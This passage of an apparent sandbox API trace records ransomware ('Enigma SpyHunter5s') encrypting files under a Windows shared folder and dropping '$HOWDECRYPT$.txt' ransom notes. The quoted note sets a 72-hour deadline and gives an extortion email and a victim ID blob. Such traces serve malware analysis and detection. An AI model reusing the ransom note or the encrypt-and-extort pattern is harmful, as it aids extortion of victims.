(lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\InkObj.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\inkobj.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0087.191] GetProcessHeap () returned 0x2c0000 [0087.191] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f8d8 | out: hHeap=0x2c0000) returned 1 [0087.191] GetProcessHeap () returned 0x2c0000 [0087.191] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x358130 | out: hHeap=0x2c0000) returned 1 [0087.191] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270fe48 | out: pbBuffer=0x270fe48) returned 1 [0087.191] GetProcessHeap () returned 0x2c0000 [0087.191] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x32f8d8 [0087.191] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32f8d8*, pdwDataLen=0x270fe40*=0x20, dwBufLen=0x30 | out: pbData=0x32f8d8*, pdwDataLen=0x270fe40*=0x30) returned 1 [0087.191] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\InkDiv.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\inkdiv.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0087.191] GetProcessHeap () returned 0x2c0000 [0087.191] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f8d8 | out: hHeap=0x2c0000) returned 1 [0087.191] GetProcessHeap () returned 0x2c0000 [0087.191] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x358060 | out: hHeap=0x2c0000) returned 1 [0087.191] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270fe40 | out: pbBuffer=0x270fe40) returned 1 [0087.191] GetProcessHeap () returned 0x2c0000 [0087.191] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x32f8d8 [0087.192] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32f8d8*, pdwDataLen=0x270fe38*=0x20, dwBufLen=0x30 | out: pbData=0x32f8d8*, pdwDataLen=0x270fe38*=0x30) returned 1 [0087.192] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrusash.dat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwrusash.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0087.196] GetProcessHeap () returned 0x2c0000 [0087.196] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f8d8 | out: hHeap=0x2c0000) returned 1 [0087.196] GetProcessHeap () returned 0x2c0000 [0087.196] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x353e78 | out: hHeap=0x2c0000) returned 1 [0087.196] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270fe40 | out: pbBuffer=0x270fe40) returned 1 [0087.196] GetProcessHeap () returned 0x2c0000 [0087.196] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x32f8d8 [0087.196] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32f8d8*, pdwDataLen=0x270fe38*=0x20, dwBufLen=0x30 | out: pbData=0x32f8d8*, pdwDataLen=0x270fe38*=0x30) returned 1 [0087.196] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwruksh.dat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwruksh.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0087.196] GetProcessHeap () returned 0x2c0000 [0087.196] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f8d8 | out: hHeap=0x2c0000) returned 1 [0087.196] GetProcessHeap () returned 0x2c0000 [0087.196] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x353cd8 | out: hHeap=0x2c0000) returned 1 [0087.196] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270fe38 | out: pbBuffer=0x270fe38) returned 1 [0087.196] GetProcessHeap () returned 0x2c0000 [0087.196] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x32f8d8 [0087.197] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32f8d8*, pdwDataLen=0x270fe30*=0x20, dwBufLen=0x30 | out: pbData=0x32f8d8*, pdwDataLen=0x270fe30*=0x30) returned 1 [0087.197] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwruklm.dat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwruklm.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0087.197] GetProcessHeap () returned 0x2c0000 [0087.197] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f8d8 | out: hHeap=0x2c0000) returned 1 [0087.197] GetProcessHeap () returned 0x2c0000 [0087.197] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x353c08 | out: hHeap=0x2c0000) returned 1 [0087.197] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270fe38 | out: pbBuffer=0x270fe38) returned 1 [0087.197] GetProcessHeap () returned 0x2c0000 [0087.197] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x32f8d8 [0087.197] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32f8d8*, pdwDataLen=0x270fe30*=0x20, dwBufLen=0x30 | out: pbData=0x32f8d8*, pdwDataLen=0x270fe30*=0x30) returned 1 [0087.197] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrlatinlm.dat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwrlatinlm.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0087.197] GetProcessHeap () returned 0x2c0000 [0087.197] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f8d8 | out: hHeap=0x2c0000) returned 1 [0087.197] GetProcessHeap () returned 0x2c0000 [0087.197] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x324560 | out: hHeap=0x2c0000) returned 1 [0087.197] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270fe30 | out: pbBuffer=0x270fe30) returned 1 [0087.197] GetProcessHeap () returned 0x2c0000 [0087.197] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x32f8d8 [0087.197] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32f8d8*, pdwDataLen=0x270fe28*=0x20, dwBufLen=0x30 | out: pbData=0x32f8d8*, pdwDataLen=0x270fe28*=0x30) returned 1 [0087.198] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrenclm.dat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwrenclm.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0087.199] GetProcessHeap () returned 0x2c0000 [0087.199] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f8d8 | out: hHeap=0x2c0000) returned 1 [0087.199] GetProcessHeap () returned 0x2c0000 [0087.199] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x353b38 | out: hHeap=0x2c0000) returned 1 [0087.199] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270fe30 | out: pbBuffer=0x270fe30) returned 1 [0087.199] GetProcessHeap () returned 0x2c0000 [0087.199] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x32f8d8 [0087.199] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32f8d8*, pdwDataLen=0x270fe28*=0x20, dwBufLen=0x30 | out: pbData=0x32f8d8*, pdwDataLen=0x270fe28*=0x30) returned 1 [0087.199] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrenalm.dat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwrenalm.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0087.199] GetProcessHeap () returned 0x2c0000 [0087.199] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f8d8 | out: hHeap=0x2c0000) returned 1 [0087.199] GetProcessHeap () returned 0x2c0000 [0087.199] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x370cb8 | out: hHeap=0x2c0000) returned 1 [0087.200] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\HWRCustomization\\$HOWDECRYPT$.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwrcustomization\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0087.200] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0087.200] WriteFile (in: hFile=0x15c, lpBuffer=0x270fd5f*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x270fe88, lpOverlapped=0x0 | out: lpBuffer=0x270fd5f*, lpNumberOfBytesWritten=0x270fe88*=0x127, lpOverlapped=0x0) returned 1 [0087.201] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0087.201] WriteFile (in: hFile=0x15c, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x270fe88, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x270fe88*=0x2ac, lpOverlapped=0x0) returned 1 [0087.201] CloseHandle (hObject=0x15c) returned 1 [0087.201] GetProcessHeap () returned 0x2c0000 [0087.201] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x353a38 | out: hHeap=0x2c0000) returned 1 [0087.201] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270fe28 | out: pbBuffer=0x270fe28) returned 1 [0087.201] GetProcessHeap () returned 0x2c0000 [0087.202] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x32f8d8 [0087.202] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32f8d8*, pdwDataLen=0x270fe20*=0x20, dwBufLen=0x30 | out: pbData=0x32f8d8*, pdwDataLen=0x270fe20*=0x30) returned 1 [0087.202] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrcommonlm.dat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwrcommonlm.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0087.202] GetProcessHeap () returned 0x2c0000 [0087.202] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f8d8 | out: hHeap=0x2c0000) returned 1 [0087.202] GetProcessHeap () returned 0x2c0000 [0087.202] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x324638 | out: hHeap=0x2c0000) returned 1 [0087.202] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hu-HU\\$HOWDECRYPT$.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hu-hu\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0087.202] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0087.202] WriteFile (in: hFile=0x15c, lpBuffer=0x270fd57*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x270fe80, lpOverlapped=0x0 | out: lpBuffer=0x270fd57*, lpNumberOfBytesWritten=0x270fe80*=0x127, lpOverlapped=0x0) returned 1 [0087.203] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0087.203] WriteFile (in: hFile=0x15c, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x270fe80, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x270fe80*=0x2ac, lpOverlapped=0x0) returned 1 [0087.203] CloseHandle (hObject=0x15c) returned 1 [0087.203] GetProcessHeap () returned 0x2c0000 [0087.203] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x372cf8 | out: hHeap=0x2c0000) returned 1 [0087.204] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270fe20 | out: pbBuffer=0x270fe20) returned 1 [0087.204] GetProcessHeap () returned 0x2c0000 [0087.204] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x32f8d8 [0087.204] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32f8d8*, pdwDataLen=0x270fe18*=0x20, dwBufLen=0x30 | out: pbData=0x32f8d8*, pdwDataLen=0x270fe18*=0x30) returned 1 [0087.204] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hu-HU\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hu-hu\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0087.204] GetProcessHeap () returned 0x2c0000 [0087.204] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f8d8 | out: hHeap=0x2c0000) returned 1 [0087.204] GetProcessHeap () returned 0x2c0000 [0087.204] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x372c10 | out: hHeap=0x2c0000) returned 1 [0087.204] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hr-HR\\$HOWDECRYPT$.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hr-hr\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0087.204] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0087.204] WriteFile (in: hFile=0x15c, lpBuffer=0x270fd4f*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x270fe78, lpOverlapped=0x0 | out: lpBuffer=0x270fd4f*, lpNumberOfBytesWritten=0x270fe78*=0x127, lpOverlapped=0x0) returned 1 [0087.205] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0087.205] WriteFile (in: hFile=0x15c, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x270fe78, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x270fe78*=0x2ac, lpOverlapped=0x0) returned 1 [0087.205] CloseHandle (hObject=0x15c) returned 1 [0087.205] GetProcessHeap () returned 0x2c0000 [0087.206] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x372b28 | out: hHeap=0x2c0000) returned 1 [0087.206] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270fe18 | out: pbBuffer=0x270fe18) returned 1 [0087.206] GetProcessHeap () returned 0x2c0000 [0087.206] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x32f8d8 [0087.206] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32f8d8*, pdwDataLen=0x270fe10*=0x20, dwBufLen=0x30 | out: pbData=0x32f8d8*, pdwDataLen=0x270fe10*=0x30) returned 1 [0087.206] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hr-HR\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hr-hr\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0087.207] GetProcessHeap () returned 0x2c0000 [0087.207] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f8d8 | out: hHeap=0x2c0000) returned 1 [0087.207] GetProcessHeap () returned 0x2c0000 [0087.207] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x372a40 | out: hHeap=0x2c0000) returned 1 [0087.207] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\he-IL\\$HOWDECRYPT$.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\he-il\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0087.207] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0087.207] WriteFile (in: hFile=0x15c, lpBuffer=0x270fd47*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x270fe70, lpOverlapped=0x0 | out: lpBuffer=0x270fd47*, lpNumberOfBytesWritten=0x270fe70*=0x127, lpOverlapped=0x0) returned 1 [0087.208] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0087.208] WriteFile (in: hFile=0x15c, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x270fe70, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x270fe70*=0x2ac, lpOverlapped=0x0) returned 1 [0087.208] CloseHandle (hObject=0x15c) returned 1 [0087.209] GetProcessHeap () returned 0x2c0000 [0087.209] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x372958 | out: hHeap=0x2c0000) returned 1 [0087.209] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270fe10 | out: pbBuffer=0x270fe10) returned 1 [0087.209] GetProcessHeap () returned 0x2c0000 [0087.209] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x32f8d8 [0087.209] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32f8d8*, pdwDataLen=0x270fe08*=0x20, dwBufLen=0x30 | out: pbData=0x32f8d8*, pdwDataLen=0x270fe08*=0x30) returned 1 [0087.209] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\he-IL\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\he-il\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0087.209] GetProcessHeap () returned 0x2c0000 [0087.209] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f8d8 | out: hHeap=0x2c0000) returned 1 [0087.209] GetProcessHeap () returned 0x2c0000 [0087.209] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3726a0 | out: hHeap=0x2c0000) returned 1 [0087.209] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\$HOWDECRYPT$.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0087.210] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0087.210] WriteFile (in: hFile=0x15c, lpBuffer=0x270fd3f*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x270fe68, lpOverlapped=0x0 | out: lpBuffer=0x270fd3f*, lpNumberOfBytesWritten=0x270fe68*=0x127, lpOverlapped=0x0) returned 1 [0087.211] lstrlenA 